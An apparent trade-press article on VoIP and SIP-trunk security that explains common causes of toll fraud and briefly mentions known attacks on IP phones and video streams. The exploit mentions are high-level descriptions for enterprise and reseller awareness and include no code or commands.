1. Inadequate user authentication and access control. Toll fraudsters have gained access to enterprise PBXs because user authentication and access controls are inadequate in many deployments. Most often, the problem is the utilization of weak or default passwords. Many enterprises deploy highly robust authentication mechanisms to secure data traffic – such as twofactor authentication – but they neglect to extend this same level of access control and authentication to their telephony end-points.
2. A security architecture that relies solely on session border controllers (SBCs) or Media Gateways (MG). As components in the typical SIP-based VoIP architecture, SBCs provide critical network interoperability and related demarcation functionality and help to manage boundaries between networks when terminating SIP trunks. However, SBCs and MGs are not dedicated security devices and their authentication, access control, encryption, and threat mitigation functionality can leave them vulnerable to application-layer exploits. Examples include the ability to conduct reconnaissance and map internal systems, to gain knowledge of extensions to exploit. They also can log-in using spoofed identities to gain access to the PSTN.
3. VLAN management. Virtual Local Area Networks are frequently used to logically segregate voice and data traffic and to then ‘bridge’ the two networks for UC-related applications. But VLAN separation is easily defeated by a moderately sophisticated attacker. Furthermore, an attacker can remotely take control over a PC running a VoIP softphone client and compromise the entire VoIP and data network. VLAN separation is not a comprehensive security measure and must be supplemented by others.
4. Encryption errors. Some security breaches that lead to toll fraud start with inadequate use of encryption, leading to the interception and misuse of user credentials. Inadequate use of encryption is one of the chief security lapses in VoIP deployments. Encryption is frequently deployed for external communications that may use the Internet or another untrusted network but encryption is frequently not used on internal networks, even though many breaches could have been prevented by it. It is important to not be misled into thinking encryption alone equals security. Encryption provides privacy, and it can be just as easy for an attacker to encrypt a threat from a compromised end-point.
Guy Koster, Director of Product Marketing at Westcon Convergence, commented: “Moving telephony off dedicated infrastructures on to the IP network, although an enabler to a richer multi-media communications experience, brings with it a number of new challenges. VARs must be educated, and then trained to understand these issues and their implications and be able to act as a trusted advisor to their customers. When it comes to toll fraud, ignorance is not bliss.” Toll fraud is not the only threat that enterprises face. Other examples of known exploits include:
1. Via an http: command it is possible to remotely activate the microphone on conference handsets in meeting rooms and record conversations.
2. There is the equivalent of a key-logger for IP phones which not only records the numbers dialed but also any keys used for punching in passcodes, pin numbers etc.
3. It is possible to inject unauthorised video into video streams e.g. in teleconferencing applications or IP video surveillance systems. As Max Clifford wrote (Radio Times 25 July) with reference to the alleged News of the World scandal – ‘Phonetapping? It’s more widespread than people thought’ – and much more sophisticated.
The increasing adoption of SIP trunks combined with the evolving UC market creates new opportunities for fraudsters and increased risk to corporations – but the benefits outweigh the risks as long as those risks are understood, managed and mitigated.
Latest posts by (see all)
- Avaya considering $5 billion buy out - March 27, 2019
- Mitel Appoints Graham Bevington as EVP and Chief Sales Officer - April 10, 2015
- Exertis is the New Name for Micro-P - October 24, 2013